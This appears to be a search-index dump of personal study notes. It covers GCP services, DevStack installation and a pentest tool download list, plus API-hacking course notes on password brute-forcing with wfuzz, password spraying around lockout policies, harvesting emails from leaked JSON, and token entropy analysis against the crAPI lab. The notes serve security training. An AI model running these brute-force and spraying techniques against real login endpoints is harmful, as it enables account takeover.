              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#52-cloud-iam-permissions","title":"5.2. Cloud IAM Permissions","text":"
              • Permissions determine the operations performed on a resource (launch an instance, deploy an object into a store bucket.)
              • Correspond 1:1 with REST methods of GCP resources. GCP is based on a collection of APIs.
              • Each GCP resource exposes REST APIs to perform operations.
              • Permissions are directly mapped to each REST API.
                • Publisher.Publish() -> pubsub.topics.publish.
              • Permissions cannot be assigned directly to members/users, but to a role. You group multiple permissions into a role and to assign that role to a member.
              • One or more permissions are assigned to an IAM Role
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#53-cloud-iam-roles","title":"5.3. Cloud IAM Roles","text":"

              Roles are a logical grouping of permissions.

              • Primitive roles:
                • Owner: unlimited access to a resource.
                • Editor.
                • Viewer.
              • Predefined roles that associate a set of operations typically associated to objects. Every object in GCP has a set of predefined roles:
                • roles/pubsub.publisher
                • roles/compute.admin
                • roles/storage.objectAdmin
              • Custom roles:
                • Collection of assorted set of permissions.
                • Fine-grained access to resources.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#54-key-elements-of-cloud-iam","title":"5.4. Key Elements of Cloud IAM","text":"
              • Resource \u2013 Any GCP resource
                • Projects
                • Cloud Storage Buckets
                • Compute Engine Instances
                • ...
              • Permissions - Determines operations allowed on a resource
                • Syntax for calling permissions:
                  <service>.<resource>.<verb>\n    - pubsub.subscriptions.consume\n    - compute.instances.insert\n
              • Roles \u2013 A collection of permissions

                • Compute.instanceAdmin
                  • compute.instances.start
                  • compute.instances.stop
                  • compute.instances.delete
                  • \u2026.
              • Users \u2013 Represents an identity

                • Google Account
                • Google Group
                • G Suite Domain
                • \u2026
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#55-service-accounts","title":"5.5. Service Accounts","text":"
              • A special Google account that belongs to an application or VM. It doesn't represent an user or identities.
              • Service account is identified by its unique email address assigned by GCP, you don't have control on it, it's automatically created by GCP.
              • Service accounts are associated with key-pairs used for authentication . This key is the token that identified the application.
              • Two types of service accounts:
                • User managed, which can be associated with a role.
                • Google managed.
              • Each service account is associated with one or more roles.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#6-database-services","title":"6. Database Services","text":"
              • GCP has managed relational and NoSQL database services.
              • Traditional web and line-of-business apps may use RDBMS.
              • Modern applications rely on NoSQL databases.
              • Google has Web-scale, distributed applications need multi-region databases.
              • In-memory database is used for accelerating the performance of apps
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#61-google-cloud-sql","title":"6.1. Google Cloud SQL","text":"
              • One of the most common services in GCP.
              • Fully managed RDBMS service that simplifies set up, maintain, manage, and administer database instances.
              • Cloud SQL supports three types of RDBMS (Relational DataBase Management Servers):
                • MySQL
                • PostgreSQL
                • Microsoft SQL Server (Preview)
              • A managed alternative to running RDBMS in VMs.
              • Cloud SQL delivers scalability, availability, security, and reliability of database instances.
              • Cloud SQL instances may be launched within VPC for additional security.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#62-google-clod-bigtable","title":"6.2. Google Clod Bigtable","text":"
              • Petabyte-scale, managed NoSQL database service.
              • Sparsely populated table that can scale to billions of rows and thousands of columns.
              • Storage engine for large-scale, low-latency applications.
              • Ideal for throughput-intensive data processing and analytics.
              • An alternative to running Apache HBase column-oriented database in VMs.
              • Acts as a storage engine for MapReduce operations, stream processing, and machine-learning applications
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#63-google-cloud-spanner","title":"6.3. Google Cloud Spanner","text":"
              • Managed, scalable, relational database service for regional and global application data.
              • Scales horizontally across rows, regions, and continents.
              • Brings best of relational and NoSQL databases.
              • Supports ACID transactions and ANSI SQL queries.
              • Data is replicated synchronously with globally strong consistency.
              • Cloud Spanner instances run in one of the three region types:
                • Read-write
                • Read-only
                • Witness
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#64-google-cloud-memorystore","title":"6.4. Google Cloud Memorystore","text":"
              • A fully-managed in-memory data store service for Redis.
              • Ideal for application caches that provides sub-millisecond data access.
              • Cloud Memorystore can support instances up to 300 GB and network throughput of 12 Gbps.
              • Fully compatible with Redis protocol.
              • Promises 99.9% availability with automatic failover.
              • Integrated with Stackdriver for monitoring.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#7-data-and-analytics-services","title":"7. Data and Analytics Services","text":"
              • Data analytics include ingestion, collection, processing, analyzing, visualizing data.
              • GCP has a comprehensive set of analytics services.
              • Cloud Pub/Sub is typically used for ingesting data at scale, whether it is telemetry data coming from sensors or logs coming from your applications and infrastructure.
              • Cloud Dataflow can process data in real-time or batch mode.
              • Cloud Dataproc is a Big Data service for running Hadoop and Spark jobs. These are typically used with MapReduce with large data sets that form the big data stores with historical data or data stored in traditional databases.
              • BigQuery is the data warehouse in the cloud. Lot of Google Cloud customers rely on BigQuery for analyzing historical data and deriving insights from that.
              • Cloud Datalab is used for analyzing and visualizing data
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#71-google-cloud-pub-sub","title":"7.1. Google Cloud Pub / Sub","text":"
              • Managed service to ingest data at scale.
              • Based on the publishing/subscription pattern. It is built using the published subscribe pattern where you have a set of publishers that send messages to a topic, and there are a set of subscribers that subscribe to the topic, and Pub/Sub provides the infrastructure for the publishers and subscribers to reliably exchange messages.
              • Global entry point to GCP-based analytics services.
              • Acts as a simple and reliable staging location for data. Pub/Sub is not meant to be a durable data store.
              • Tightly integrated with services such as Cloud Storage and Cloud Dataflow.
              • Supports at-least-once delivery with synchronous, cross-zone message replication. What this means is you actually get a highly reliable delivery mechanism based on Pub/Sub, and there is redundancy because of cross zone message replication. You don't lose messages when it is sent via Cloud Pub/Sub infrastructure.
              • Comes with end-to-end encryption, IAM, and audit logging.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#72-google-cloud-dataflow","title":"7.2. Google Cloud Dataflow","text":"
              • Managed service for transforming and enhancing data in stream and batch modes: Cloud Dataflow is meant for transforming and enhancing data, either coming via real-time streams or data stored in Cloud Storage, which is processed in batch mode.
              • Based on Apache Beam open source project: Cloud Dataflow is based on an open source project called Apache Beam. Google is one of the key contributors to Apache Beam open source project. And Cloud Dataflow is a commercial implementation of Apache Beam, and it supports a serverless approach, which automates provisioning and management.
              • Serverless approach automates provisioning and management: With serverless infrastructure and serverless computing, you don't need to provision resources and scale them manually. Instead, you start streaming the data and connecting that to Dataflow, maybe via Pub/Sub. And it can automatically start processing the data and scales the infrastructure based on the inbound data stream.
              • Inbound data can be queried, processed, and extracted for target environment.
              • Tightly integrated with Cloud Pub/Sub, BigQuery, and Cloud Machine Learning.
              • Cloud Dataflow connector for Kafka makes it easy to integrate Apache Kafka.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#73-google-cloud-dataproc","title":"7.3. Google Cloud Dataproc","text":"
              • Managed Apache Hadoop and Apache Spark cluster environments.
              • Automated cluster management.
              • Clusters can be quickly created and resized from three to hundreds of node.
              • Move existing Big Data projects to GCP without redevelopment.
              • Frequent updates to Spark, Hadoop, Pig, and Hive and other components of the Apache ecosystem.
              • Integrates with other GCP services like Cloud Dataflow and BigQuery

              In the Dataproc sync pipeline, data enters through Pub/Sub, gets transformed through Dataflow, and gets processed with Dataproc. Typically in the form of a map reduce job, retain for Apache Hadoop or Apache Spark. And the output of Dataproc can be stored in Big Query, or it can go to Google cloud storage.

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#74-google-cloud-datalab","title":"7.4. Google Cloud DataLab","text":"
              • Interactive tool for data exploration, analysis, visualization, and machine learning.
              • Runs on Compute Engine and may connect to multiple cloud services.
              • Built on open source Jupyter Notebooks platform.
              • Enables analysis data coming from BigQuery, Cloud ML Engine, and Cloud Storage.
              • Supports Python, SQL, and JavaScript languages.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#75-bigquery","title":"7.5. BigQuery","text":"
              • Serverless, scalable cloud data warehouse.: \u00a0Google BigQuery is one of the early analytic services that got added to GCP. It's a very powerful, very popular service used by Enterprise customers to analyze data.
              • Has an in-memory BI Engine and machine learning built in, so as you query data from BigQuery you can apply machine learning algorithms that can perform predictive analytics right out of the box.
              • Supports standard ANSI:2011 SQL dialect for querying. You don't need to learn new languages your domain specific languages to deal with BigQuery. You can use familiar SQL queries that support inner joins, outer joins, group by clauses and WHERE clauses to extract data and to analyze from existing data stores.
              • Federated queries can process external data sources. BigQuery can pull the data from all of these sources and can perform one single query that will automatically join and do group by clauses so you get a unified view of the dataset:
                • Cloud Storage.
                • Cloud Bigtable.
                • Spreadsheets (Google Drive).
              • Automatically replicates data to keep a seven-day history of changes.
              • Supports data integration tools like Informatica and Talend.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#case-use","title":"Case use","text":"

              Open BigQuery and open a public dataset. Select Stack Overflow. We will try to extract the number of users in Stack Overflow with gold badges and how many days it took them to get there.

              # Run the below SQL statement in BigQuery \n\nSELECT badge_name AS First_Gold_Badge,  \n       COUNT(1) AS Num_Users, \n       ROUND(AVG(tenure_in_days)) AS Avg_Num_Days \nFROM \n( \n  SELECT  \n    badges.user_id AS user_id, \n    badges.name AS badge_name, \n    TIMESTAMP_DIFF(badges.date, users.creation_date, DAY) AS tenure_in_days, \n    ROW_NUMBER() OVER (PARTITION BY badges.user_id \n                       ORDER BY badges.date) AS row_number \n  FROM  \n    `bigquery-public-data.stackoverflow.badges` badges \n  JOIN \n    `bigquery-public-data.stackoverflow.users` users \n  ON badges.user_id = users.id \n  WHERE badges.class = 1  \n)  \nWHERE row_number = 1 \nGROUP BY First_Gold_Badge \nORDER BY Num_Users DESC \nLIMIT 10 \n

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#8-ai-and-ml-services","title":"8. AI and ML Services","text":"
              • AI Building Blocks provide AI through simple REST API calls.
              • Cloud AutoML enables training models on custom datasets.
              • AI Platform provides end-to-end ML pipelines on-premises and cloud.
              • AI Hub is a Google hosted repository to discover, share, and deploy ML models.
              • Google Cloud Platform offers comprehensive set of ML & AI services for beginners and advanced AI engineers.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#81-ai-building-blocks","title":"8.1. AI Building Blocks","text":"

              GCP AI building blocks expose a set of APIs that can deliver AI capabilities without really training models or writing complex piece of code. So GCP AI building blocks are structured into: - Sight, that delivers vision and video based intelligence. - Conversation, which is all about text to speech and speech to text. It also includes dialogue flow, which is powering some of the capabilities that we see in Google Home, Google Assistant, and other conversational user experiences. - Language which is all about translation and natural language which deals with revealing the structure and meaning of text through machine learning. - Structure data that can be used to perform regression, classification, and prediction. - AutoML tables is a service that is meant for performing regression or classification on your structured data. - Recommendations AI deliver personalized product recommendations at scale. - Cloud Inference API is all about running large scale correlations over time series data sets.

              So, these are all techniques that can be used directly by consuming the APIs. For example, within vision, you can perform object detection or image classification by simply uploading the image or sending the image to the API. So when you upload an image or when you send the image to the vision API, it comes back with all the objects that are detected within that image or it can even classify the images that are shown in the input. Similarly, when you send text to the text to speech API it'll come back with an audio file that actually speaks out the text that is sent. So these AI building blocks are very useful to infuse AI and intelligence into your applications.

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#82-automl","title":"8.2. AutoML","text":"
              • Cloud AutoML enables training high-quality models specific to a business problem. What if you want to train a custom model but do not want to write complex code about neural networks or artificial neural networks? Well, that's where the Google Cloud AutoML comes into picture.
              • Custom machine learning models without writing code.
              • Based on Google\u2019s state-of-the-art machine learning algorithms.
              • AutoML Services.
                • Sight.
                  • Vision.
                  • Video Intelligence.
                • Language.
                  • Natural Language.
                  • Translation.
                • Structure Data.
                  • Tabular data.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#83-ai-platform","title":"8.3. AI Platform","text":"
              • Covers the entire spectrum of machine learning pipelines.
              • Built on Kubeflow, an open source ML project based on Kubernetes.
              • Includes tools for data preparation, training, and inference

              Just like a data processing pipeline, an ML processing pipeline is a comprehensive set of stages combined into a pipeline. And Kubeflow is a project that basically simplifies the process of creating these pipelines with multiple stages This is cube Kubeflow pipeline typical phases:

              Google AI platform gives us scalable infrastructure and a framework to deal with this pipeline and multiple stages of this pipeline. Google AI Platform is not just confined to cloud. Customers running on premises Kubernetes infrastructure can deploy AI platform on-prem and it can be seamlessly extended to the cloud which means they can train on-prem but deploy it in the cloud or train in the cloud, but deploy the models on-prem. Kubeflow is the underlying framework and the infrastructure that supports the entire processing pipeline whether it is on-prem or in the public cloud.

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#84-ai-hub","title":"8.4. AI Hub","text":"
              • Hosted repository of plug-and-play AI components.
              • Makes it easy for data scientists and teams to collaborate.
              • AI Hub can host private and public content.
              • AI Hub includes.
                • Kubeflow Pipeline components.
                • Jupyter Notebooks.
                • TensorFlow modules.
                  • VM Images.
                • Trained models.
                • \u2026
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#9-devops-services","title":"9. Devops Services","text":"
              • DevOps Services provide tools and frameworks for automation.
              • Cloud Source Repositories store and track source code.
              • Cloud Build automates continuous integration and deployment.
              • Container Registry acts as the central repository for storing, securing, and managing Docker container images.
              • IDE and tools integration enables developer productivity.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#91-google-cloud-source-repositories","title":"9.1. Google Cloud Source Repositories","text":"
              • Acts as a scalable, private Git repository.
              • Extends standard Git workflow to Cloud Build, Cloud Pub/Sub and Compute services: The advantage of using Google Cloud Source Repositories is to maintain the source code very close to your deployment target. That could be compute engine, app engine, functions, or kubernetes engine.
              • Unlimited private Git repositories that can mirror code from Github and Bitbucket repos.
              • Triggers to automatically build, test, and deploy code.
              • Integrated regular expression-based code search.
              • Single source of code for deployments across GCE, GAE, GKE, and Functions.

              You should consider cloud source repos when you want to manage the life cycle of an application within GCP, all the way from storing the code to deploying and iterating over your code multiple times.

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#92-google-cloud-build","title":"9.2. Google Cloud Build","text":"
              • Managed service for source code build management.
              • The CI/CD tool running with Google Cloud Platform: Google Cloud build is the CI/CD tool for building the code that is stored either in source code cloud repos, or an external Git repository.
              • Supports building software written in any language.
              • Custom workflow to deploy across multiple target environments.
              • Tight integration with Cloud Source Repo, GitHub, and Bitbucket, which is going to be the source for your code repositories and they act as the initial phase for triggering the entire CI/CD pipeline.
              • Supports native Docker integration with automated deployment to Kubernetes and GKE.
              • Identifies vulnerabilities through efficient OS package scanning: Apart from packaging and deploying source code, the service can also identify vulnerabilities through efficient OS package scanning.

              Google Cloud Build takes the source code stored either in source code repo of GCP or Bitbucket, GitLab or GitHub and creates the integration and deployment pipeline.

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#93-google-container-registry","title":"9.3. Google Container Registry","text":"

              Google Cloud Source Code Reports will store your Source Code while Cloud Build is going to be responsible for building and packaging your applications. Container Registry is going to store the Docker images and the artifacts in a centralized registry.

              • Single location to manage container images and repositories.
              • Store images close to GCE, GKE, and Kubernetes clusters: Because the Container Registry is co-located with Compute it is going to be extremely fast.
              • Secure, private, scalable Docker registry within GCP.
              • Supports RBAC to access, view, and download images.
              • Detects vulnerabilities in early stages of the software deployment: The service detects vulnerabilities in early stages of software deployment.
              • Supports automatic lock-down of vulnerable container images.
              • Automated container build process based on code or tag changes.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#use-case-adding-an-image-to-gcp-container-registry","title":"Use case: adding an image to GCP Container Registry","text":"

              In GCP Dashboard go yo Container Registry. First time it will be empty.

              # Run the below commands in Google Cloud Shell \n gcloud services enable containerregistry.googleapis.com \n\nexport PROJECT_ID=<PROJECT ID> # Replace this with your GCP Project ID \n\ndocker pull busybox \ndocker images \n
              cat <<EOF >>Dockerfile \nfrom busybox:latest \nCMD [\"date\"] \nEOF\n
              docker build . -t mybusybox \u00e7\n\n# Tag your image with the convention stated by GCP\ndocker tag mybusybox gcr.io/$PROJECT_ID/mybusybox:latest \n# When listing images with docker images, you will see it renamed.\n\n# Run your image\ndocker run gcr.io/$PROJECT_ID/mybusybox:latest \n\n# Wire the credentials of GCP Container Registry with Docker\ngcloud auth configure-docker \n\n# Take our mybusybox image available in the environment and pushes it to the Container Registry.\ndocker push gcr.io/$PROJECT_ID/mybusybox:latest \n
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#94-devel-tools-integration","title":"9.4. Devel Tools Integration","text":"
              • IDE plugins for popular development tools.
                • IntelliJ.
                • Visual Studio.
                • Eclipse.
              • Tight integration between IDEs and managed SCM, build services.
              • Automates generating configuration files and deployment scripts.
              • Makes GCP libraries and SDKs available within the IDEs.
              • Enhances developer productivity
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#10-other-gcp-services","title":"10. Other GCP services","text":"","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#101-iot-services","title":"10.1. IoT Services","text":"

              GCP IoT has two essential services.

              • Cloud IoT Core: Cloud IoT Core provides machine to machine communication, device registry and overall device management capabilities. If you have multiple sensors, multiple actuators and multiple devices that need to be connected to the cloud you would use IoT core. IoT Core provides authentication and authorization of devices. It also enables machines to talk to each other. And finally you can manage the entire life cycle of devices. Tightly integrated with cloud pub/sub, and cloud functions.
              • Edge TPU: It is a hardware that is available to accelerate AI model standing at Edge. Edge is essentially a device that can run business logic and even artificial intelligence models in offline mode. So Edge TPU plays the role of a micro TPU or GPU that is attached to the Edge devices. When you run a TensorFlow model on a device powered by Edge TPU, the inference that is the process of performing classification or detection or predictions will be much faster. Edge TPU is available as a chip that is going to be attached to an Edge device like a Raspberry Pi or an x86 device.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#102-api-management","title":"10.2. API Management","text":"
              • Apigee API Platform \u00a0provides the capabilities for designing securing, publishing, analyzing, and monitoring APIs. Developers can benefit from using the APG API platform for managing the end-to-end life cycle of APIs.
              • API Analytics: API analytics provide end-to-end visibility across API programs with developer engagement and business metrics.
              • Cloud Endpoints is a service that is meant to develop, deploy, and manage APIs in the Google Cloud environment. It is based on an Nginx based proxy and it uses open API specification As the API framework. Cloud endpoints gives developers the tools they need to manage the entire API development from the beginning till deploying and maintaining them with tight integration.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#103-hybrid-and-multicloud-services","title":"10.3. Hybrid and Multicloud Services","text":"
              • Traffic Director routes the traffic across virtual machines and containers deployed across multiple regions.
              • Stackdriver is the observability platform for tracing, debugging, logging, and gaining insights into application performance and infrastructure monitoring.
              • GKE On-Prem takes Google Kubernetes engine and runs that within the local data center environment or on-premises.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#104-anthos","title":"10.4. Anthos","text":"
              • Anthos is a Google\u2019s multi-cloud and hybrid cloud platform based on Kubernetes and GKE.
              • Anthos enables managed Kubernetes service (GKE) in a variety of environments. Anthos enables customers to run and take control of multiple kubernetes clusters deployed through GKE and run it on other Cloud environments.
              • Anthos can be deployed in:
                • Google Cloud
                • vSphere (on-premises)
                • Amazon Web Services
                • Microsoft Azure
              • Non-GKE Kubernetes clusters can be attached to Anthos: Apart from launching and managing Kubernetes clusters through Anthos, you can also onboard and register clusters that were created outside of Anthos.
              • Delivers centralized management and operations for Kubernetes clusters running diverse environments.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#105-migration-tools","title":"10.5. Migration Tools","text":"
              • Transfer Appliance provides bulk data transfer from your data center to the cloud based on a physical appliance.
              • Migrate for Compute Engine is based on a tool called Illustrator that Google acquired in 2022 and this provides the capability of migrating existing virtual machines or even physical machines into GCE VMs.
              • Big Query Data transfer Service is a tool to run scheduled upload from third party SaaS tools and SaaS platforms into BigQuery data platform.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/openstasck/openstack-essentials/","title":"Openstack Essentials","text":"

              OpenStack is a set of opensource software tools for building and managing cloud computing platforms for public and private clouds. Go to official documentation.

              It can be managed from web application dashboard, command line tools, and from restful web services.

              ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#overview-of-openstack-services","title":"Overview of OpenStack services","text":"","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#quick-start","title":"Quick Start","text":"

              Follow instructions from: https://docs.openstack.org/devstack/latest/

              ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#1-install-linux","title":"1. Install Linux","text":"

              Start with a clean and minimal install of a Linux system. DevStack attempts to support the two latest LTS releases of Ubuntu, Rocky Linux 9 and openEuler.

              If you do not have a preference, Ubuntu 22.04 (Jammy) is the most tested, and will probably go the smoothest.

              ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#2-add-stack-user-optional","title":"2. Add Stack User (optional)","text":"

              DevStack should be run as a non-root user with sudo enabled (standard logins to cloud images such as \u201cubuntu\u201d or \u201ccloud-user\u201d are usually fine).

              If you are not using a cloud image, you can create a separate\u00a0stack\u00a0user to run DevStack with

              sudo useradd -s /bin/bash -d /opt/stack -m stack\n

              Ensure home directory for the\u00a0stack\u00a0user has executable permission for all, as RHEL based distros create it with\u00a0700\u00a0and Ubuntu 21.04+ with\u00a0750\u00a0which can cause issues during deployment.

              sudo chmod +x /opt/stack\n

              Since this user will be making many changes to your system, it should have sudo privileges:

              echo \"stack ALL=(ALL) NOPASSWD: ALL\" | sudo tee /etc/sudoers.d/stack\nsudo -u stack -i\n
              ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#3-download-devstack","title":"3. Download DevStack","text":"
              git clone https://opendev.org/openstack/devstack\ncd devstack\n

              The\u00a0devstack\u00a0repo contains a script that installs OpenStack and templates for configuration files.

              ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#4-create-a-localconf","title":"4. Create a local.conf","text":"

              Create a\u00a0local.conf\u00a0file with four passwords preset at the root of the devstack git repo.

              [[local|localrc]]\nADMIN_PASSWORD=secret\nDATABASE_PASSWORD=$ADMIN_PASSWORD\nRABBIT_PASSWORD=$ADMIN_PASSWORD\nSERVICE_PASSWORD=$ADMIN_PASSWORD\n

              This is the minimum required config to get started with DevStack. There is a sample\u00a0local.conf\u00a0file under the\u00a0samples\u00a0directory in the devstack repository.

              Warning: Only use alphanumeric characters in your passwords, as some services fail to work when using special characters.

              ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#5-start-the-install","title":"5. Start the install","text":"
              ./stack.sh\n

              This will take 15 - 30 minutes, largely depending on the speed of your internet connection. Many git trees and packages will be installed during this process.

              ","tags":["cloud","Openstack","open source"]},{"location":"files/index-of-files/","title":"Index of downloads","text":"

              These are some of the tools that I use when conducting penetration testing. Most of them have their own updated repositories, so the best approach for you would be to visit the official repository or download the source code. In my case, when dealing with restricted environments, there are times when I require a direct download of a previously verified and clean file. Therefore, the main goal of this list is to provide me with these resources when needed, within a matter of seconds.

              • Binscope: BinScope_x64.msi
              • Echo Mirage: EchoMirage.zip | Echo Mirage at HackingLife
              • Processhacker 2.39 bin: processhacker-2.39-bin.zip | Process Hacker Monitor at HackingLife.
              • RegistryChangesView:
                • RegistryChangesView (x64): registrychangesview-x64.zip
                • RegistryChangesView (x86): registrychangesview-x86.zip
              • Regshot 1.9.0: Regshot-1.9.0.zip | Regshot at HackingLife
              • Visual Studio Code - Community downloader: vs_community__bb594837aa124b4d8487a41015a6017a.exe
              ","tags":["resources"]},{"location":"files/index-of-files/#reporting","title":"Reporting","text":"

              https://pentestreports.com/

              ","tags":["resources"]},{"location":"hackingapis/","title":"Hacking APIs","text":"","tags":["api"]},{"location":"hackingapis/#about-the-course","title":"About the course","text":"

              Notes from the course \"APIsec Certified Expert\" a practical course in API hacking imparted by Corey J. Ball.

              Course: https://university.apisec.ai/

              Book: https://www.amazon.com/Hacking-APIs-Application-Programming-Interfaces/dp/1718502443

              Instructor: Corey J. Ball.

              ","tags":["api"]},{"location":"hackingapis/#general-index-of-the-course","title":"General index of the course","text":"
              • Setting up the environment
              • Setting up the labs + Writeups
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/","title":"API authentication attacks","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#classic-authentication-attacks","title":"Classic authentication attacks","text":"

              We'll consider two attacks: Password Brute-Force Attack, and Password Spraying. These attacks may take place every time that Basic Authentication is deployed in the context of a RESTful API.

              The principle of Basic authentication is that the consumer issues a request containing a username and password.

              As RESTful APIs don't maintain a state, the API need to leverage basic authentication across all endpoints. Instead of doing this, the API may leverage basic authentication once using an authentication portal, then upon providing the correct credentials, a token would be issued to be used in subsequent requests.

              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#1-password-brute-force-attacks","title":"1. Password Brute-Force Attacks","text":"

              Brute-forcing an API's authentication is not very different from any other brute-force attack, except you will send the request to an API endpoint, the payload will often be in JSON, and the authentication values may be base64 encoded.

              Infinite ways to do it. You can use:

              • Intruder module of BurpSuite.
              • ZAP proxy tool.
              • wfuzz.
              • ffuf.
              • others.

              Let's see wfuzz:

              wfuzz -d {\"email\":\"hapihacker@hapihacjer.com\",\"password\":\"PASSWORD\"} -z file,/usr/share/wordlists/rockyou.txt -u http://localhost:8888/identity/api/auth/login --hc 500\n# -H to specify content-type headers. \n# -d allows you to include the POST Body data. \n# -u specifies the url\n# --hc/hl/hw/hh hide responses with the specified code/lines/words/chars. In our case, \"--hc 500\" hides 500 code responses.\n# -z specifies a payload   \n

              Tools to build password lists: + https://github.com/sc0tfree/mentalist. + CUPP - Common User Password Profiler. + crunch (already installed in kali).

              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#2-password-spraying","title":"2. Password Spraying","text":"

              Very useful if you know the password policy of the API we are attacking. Say that there is a lockout account policy for ten tries. Then you can password spray attack with 9 tries and use for that the 9 most probable passwords for all the accounts email spotted.

              As in crapi we have detected before a disclosure of information in the forum page (a json response with all kind of data from users who have posted on the forum), we can save that json response as response.json and filter out the emails of users:

              Also, using this grep command should pull everything out of a file that resembles an email. Then you can save those captured emails to a file and use that file as a payload in Burp Suite. You can then use a command like sort -u to get rid of duplicate emails.

              grep -oe \"[a-zA-Z0-9._]\\+@[a-zA-Z]\\+.[a-zA-Z]\\+\" response.json | uniq | sort -u > mailusers.txt\n
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#api-authentication-attacks_1","title":"API Authentication Attacks","text":"

              To go further in authentification attacks we will need to analyze the API tokens and the way they are generated, and when talking about token generation and analysis, a word comes out inmediately: entropy.

              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#entropy-analysis-burpsuite-sequencers-live-capture","title":"Entropy analysis: BurpSuite Sequencer's live capture","text":"

              Instructions to set up a proxy in Postman to intercept traffic with BurpSuite and have it sent to Sequencer.

              Once you send a POST request (in which a token is generated) to Sequencer, you need to define the custom token location in the context menu. After that you can click on \"Start Live Capture\".

              BurpSuite Sequencer provides two methods for token analysis:

              • Manually analysing tokens provided in a text file. To perform a manual analys, you need to provide to BurpSuite Sequencer a minimum of 100 tokens.
              • Performing a live capture to automatically generate tokens.

              Let's focus out attention on a live capture using BurpSuite Sequencer. A live capture will provide us with 20.000 tokens automatically generated. What for?

              • To elaborate a token analysis report that measures the entropy of the token generation process (and gives us precious tips about how to brute-force, or password spray, or bypass the authentication). For instance, if an API provider is generating tokens sequentially, then even if the token were 20 plus characters long, it could be the case that many of the characters in the token do not actually change.
              • To have this large collection of 20.000 identities can help us to evade security controls.

              The token analysis report

              • The summary of the findings provides info about the quality of randomness within the token sample. The goal is to determine if there are parts of the token that do not change and other parts that often change. So full entropy would be a 100% of ramdonness (any patterns found).
              • Character-level analysis provides the degree of confidence in the randomness of the sample at each character position. The significance level at each position is the probability of the observed character-level results occurring.
              • Bit-level analysis indicates the degree of confidence in the randomness of the sample at each bit position.
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#jwt-attacks","title":"JWT attacks","text":"

